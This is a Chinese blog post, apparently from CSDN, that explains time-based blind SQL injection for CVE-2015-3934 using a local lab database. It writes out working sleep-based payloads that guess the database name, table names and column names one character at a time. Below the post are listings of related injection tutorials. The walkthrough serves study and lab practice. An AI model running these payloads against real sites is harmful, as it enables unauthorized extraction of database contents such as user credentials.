CVE-2015-3934 sql盲注payload

最新推荐文章于 2024-07-16 16:42:37 发布
最新推荐文章于 2024-07-16 16:42:37 发布
阅读量1.4k 收藏 1
点赞数 1
分类专栏: sql study 文章标签: sql inject
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_26317875/article/details/79949625
版权
study 同时被 2 个专栏收录
2 篇文章 0 订阅
订阅专栏
sql
1 篇文章 0 订阅
订阅专栏

刚刚看到CVE-2015-3934这个sql注入漏洞,发现实验机器给的脚本不算太完整,略过了数据库名和表名的猜解,直接从字段名猜解开始了。


这里以这个漏洞的payload为例,写一下整个的大体流程,也梳理一下。


这个一个基于时间的sql盲注:

python脚本,通过sql的sleep()函数控制时间,配合requests库中的timeout选项,来判断返回


原查询语句为:


用来判断注入点的语句为(语句包含单引号,url编码中%2B代表加号):user=' %2B(select(0)from(select(sleep(5)))v)%2B' 

因此构造后的sql语句: ...AND user=''%2B(select(0)from(select(sleep(5)))v)%2B'' AND password='md5';

可以看出来,使用select嵌套查询


先简单说一下select嵌套查询

基本结构

select * from(select()v)

v是第二个select的别名

至于本题为什么必须要用select嵌套查询,猜是有过滤


在本地的security(长度为8)数据库里建立一个表如下,


假设php中查询语句为:select pass from uu where user = '$user'

因此 先判断database的长度,可以传参user='+(select(0)from(select(IF(length(database())=i,sleep(5),0)))v)+'

其中的i为一个变量,当i为1~7时,查询结果为


可以看出来 0s返回结果

因为我本地测试的数据库名长度为8,所以当i为8时:


返回时间变为了5s


然后判断数据库名字:

可以传参user='+(select(0)from(select(if(ascii(substring(database(),i,1))=mid,sleep(5),1)))v)+'

其中i为database的长度,mid为猜解字符的ascii码,范围为32~126

在这里本地只演示一下第一位字符的判断:


字符s的ascii码为115,所以这个sleep了5s才返回,否则0s返回


同样的,对于表名的判断,与数据库相似:

所有表长度:

user='+(select(0)from(select(if(length(group_concat(table_name))=i,sleep(5),0))from(informaiton_schema.tables)where(table_schema=database()))v)

如下图,这个所有表加逗号的长度为32

表名猜解:

user='+(select(0)from(select(if(ascii(substr(group_concat(table_name),i,1))=mid,sleep(5),0))from(information_schema.tables)where(table_schema=database()))v)+' 其中i为上面获取的表的长度,mid为猜解字符的asc码

以我演示的为例,第一个字符为e,对应ascii码为101,因此:


表之间使用逗号连接


然后便是列长度,名的猜解,与表相似,不再赘述


回到题目:猜解数据库长度和名字的exp:


(写代码时候只顾着测试忘记写在虚拟机外面了。。结果复制不出来,将就看吧)

顺藤摸瓜,猜解表,列的exp


然后是题目给出的最终的爆破exp:


可以看见,数据库为fiyo,表名为fiyo60_user,列名为user,password


ps:group_concat(table_name) 表示将table_name使用逗号连接然后输出


group_concat(user,0x2c,password) 表示将user和password使用逗号连接然后输出


qq_26317875
关注
专栏目录
《网络安全自学教程》- SQL注入之时间盲注原理+步骤+实战操作
wangyuxiang946的博客
05-21 3452
这篇文章为大家解析时间盲注的实现原理,结合实战案例讲解时间盲注的操作步骤以及时间误差的判断
13、SQL注入——SQL盲注
qq_55202378的博客
12-05 358
SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时还需要利用一些方法进行判断或尝试,这个过程称之为盲注。在盲注中,攻击者根据其返回页面的不同来判断信息(可能时页面内容的不同,也可能时响应时间的不同)。一般情况下,盲注可分为两种:基于布尔的盲注某些情况下,页面返回的结果只要两种(正常或者错误)。通过构造SQL判断语句,查看页面的返回结果(True 或False)来判断哪些SQL判断条件成立,通过此来获取数据库中的数据。基于时间的盲注
sql注入之盲注
2301_80913334的博客
04-15 1181
sql注入过程中,sql语句执行select之后,可能由于网站代码的限制或者apache等解析器配置了不回显数据,造成在select数据之后不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个判断的过程称之为盲注。简单来说就是页面没有报错回显,不知道数据库具体返回值的情况下,对数据库中的内容进行猜解,实现sql注入。web页面只返回True,False两种值。利用页面返回不同,逐个猜解数据1、布尔盲注不推荐使用手注但也需要了解其payload的构造;
ASPX+MSSQL注如;SQL盲注
最新发布
cnzzs的博客
07-16 939
注入点基本检查在进行MSSQL注如公鸡时,首先要对MSSQL注如点进行以下基本的注入检查,以确定后面的公鸡实施方案。判断数据库类型(在数据库内创建的每个对象在sysobjects系统表中都占有一行)and exists (select * from sysobjects)数据库帐号权限判断and 1=(selectIS_S...
DVWA——SQL Injection(Blind)【详细的步骤实现(图解)包含多种盲注方法并且附上了payload
weixin_46709219的博客
01-04 737
一)区别: SQL盲注与一般注入的区别在于一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。 二)思想: 在盲注中,页面无论对错都只会以 “是” 或者 “不是”来对我们的SQL语句进行结果的反馈,因此我们需要构造payload去询问例如“数据库名字的第一个字母是不是a?”,通过问答的方式最终获取我们想要的数据。 三)盲注分为基于布尔盲注、基于
payload sql注入_优客365_v2.9 SQL注入漏洞复现(附POC)
weixin_39778582的博客
11-27 374
面由心生,相随貌转。俗话说得好HTTP_REFERER注入1、漏洞编号CNVD-2017-120172、漏洞介绍优客365是一个基于 PHP+MYSQL 开发构建的开源网站分类目录管理系统,在 2.9 版本的首页 index.php 存在基于 HTTP-REFERER 字段的 SQL 注入漏洞,攻击者可利用该漏洞执行任意 SQL 语句,获得数据库敏感信息。3、源码分析index.php...
盲注payload
MingShenfree的博客
10-27 1454
时间盲注 ​ 时间盲注也叫延时注入,一般用到函数sleep(),BENCHMARK()还会用到笛卡尔积(尽量不要使用,内容太多睡很慢很卡) ​ 一般时间盲注我们还需要使用条件判断符 ​ if(expre1,expre2,expre3),当expre1为true时,返回expre2,false时,返回expre3 ​ 盲注的同时也配合这mysql提供的分割函数 ​ substr(),substring(),left() ​ ...
SQL报错盲注详解
永远是少年
07-21 996
今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL报错盲注详解。 一、SQL报错函数详解 二、SQL报错盲注payload构造
payload sql注入_【安全通报】Discuz! X后台SQL注入漏洞安全风险公告
weixin_39531688的博客
12-20 206
↑ 点击上方蓝色字关注我们近日,Discuz! X的管理员后台SQL注入具体利用细节被披露。Discuz! 是一套基于PHP+MYSQL开发的通用性社区论坛软件系统,在国内备受用户喜爱,用户量较大。该漏洞成因是由于将appid值写入配置文件config_ucenter.php之中未进行严格的过滤。在页面刷新的时,会将config_ucenter.php中的UC_APPID取出,并拼接进S...
CVE-2022-24223 - AtomCMS SQL注入漏洞
Debugging
10-31 445
CVE-2022-24223 - AtomCMS SQL注入漏洞
java框架漏洞_Spring 框架漏洞集合
weixin_42514750的博客
02-25 5553
虽说是Spring框架漏洞,但以下包含并不仅Spring Framework,Spring Boot,还有Spring Cloud,Spring Data,Spring Security等。CVE-2010-1622 Spring Framework class.classLoader类远程代码执行影响版本:SpringSource Spring Framework 3.0.0 - 3.0.2、S...
从一个Laravel SQL注入漏洞开始的Bug Bounty之旅
离别歌
08-30 2709
事先声明:本次测试过程完全处于本地或授权环境,仅供学习与参考,不存在未授权测试过程。本文提到的漏洞《Cachet SQL注入漏洞(CVE-2021-39165)》已经修复,也请读者勿使用该...
Vulhub靶场
blalaa的博客
09-05 1756
【Django JSONField/HStoreField SQL 注入漏洞 】 ①原理 Django是一款广为流行的开源web框架,由Python编写,许多网站和app都基于Django开发。其支持很多数据库引擎,包括Postgresql、Mysql、Oracle、Sqlite3等,但与Django天生为一对儿的数据库莫过于Postgresql了,Django官方也建议配合Postgresql一起使用。 在Django中支持Postgresql的数据类型:JSONField、HStoreField、Arr
Wordpress paid-memberships-pro plugins CVE-2023-23488未授权SQLi漏洞分析
afei001
03-07 506
WordPress插件paid-memberships-pro版本
payload sql注入_sql注入之payload
weixin_28007513的博客
02-28 497
/**GET,post*有返回**/基于报错的SQL注入1、获取字段数‘ order by 5 --+2、获取表名0‘ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+select group_concat(table_name) fr...
如何使用加密的Payload来识别并利用SQL注入漏洞
weixin_33758863的博客
08-01 345
写在前面的话 密码学具有诸多优点,信息的保密性同样离不开密码学,但是从历史经验来看,在保护应用和数据安全方面我们绝对不能过分依赖于密码学。在这篇文章中,安全教育培训专家SunilYadav将会讨论一个案例,并介绍如何通过一个加密的Payload来发现并利用SQL注入漏洞。 请注意:我们在此不打算讨论密码学方面的问题(例如如何破解加密算法),我们讨论的是应...
CTFHub布尔盲注(新的payload)
weixin_44732566的博客
02-23 5471
CTFHub 布尔盲注 题目已经表明是布尔盲注,发现没有闭合,也木有过滤,本来也是道基础题,但是发现回显不对头: payload:?id=1 and 's'='p' 回显是query_success 这道题和普通的布尔盲注不一样,一般布尔盲注(我做的也不多)是数据库查询结果为空或者查询语句报错,回显error。这道题是数据库查询为空,返回还是success,只有当查询语句报错时才返回erroe。 ...
payload sql注入_记录几个实战sql绕过
weixin_39872872的博客
12-09 266
前段时间的几次渗透测试中有几个有意思的sql注入,记录一下注入的绕过过程,网站地址及部分信息都有模糊处理,并已反映给相关单位。0x01 案例一 绕安全狗加',报错,连sql语句都给了出来,典型的注入,原本以为属于可以直接一把梭的站order by查字段遭遇安全狗拦截现在需要手动绕过,感觉这个安全狗应该是比较老的版本过滤字符:order byunion selectLength(datab...
SQL注入:sqlmap布尔型盲注payload解析
无名J0kзr的博客
10-07 4075
难受 占坑明天更
cve-2015-8878
12-27
CVE-2015-8878是一种安全漏洞,它影响到了许多操作系统和软件。这个漏洞主要是通过网络进行攻击,攻击者可以利用它来远程执行恶意代码,从而获取系统的控制权限。 这个漏洞主要存在于某些操作系统和软件的内核中,一旦受到攻击,可能会导致系统崩溃或者敏感数据被盗取。因此,及时修补这个漏洞对于系统的安全性非常重要。 针对CVE-2015-8878这个漏洞,厂商已经发布了相关的安全补丁,用户可以通过更新操作系统和相关软件来修复这个漏洞。另外,一些防火墙和入侵检测系统也可以检测到这个漏洞的攻击行为,提供一定的防护。 对于企业用户来说,及时关注安全厂商的公告和通知,尽快升级补丁是保护系统安全的重要步骤。同时,加强内部网络的安全策略,限制外部的访问权限,也可以降低CVE-2015-8878对系统造成的影响。 总之,CVE-2015-8878是一个严重的安全漏洞,需要引起用户和企业的高度重视,做好安全防护工作,保护系统的安全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值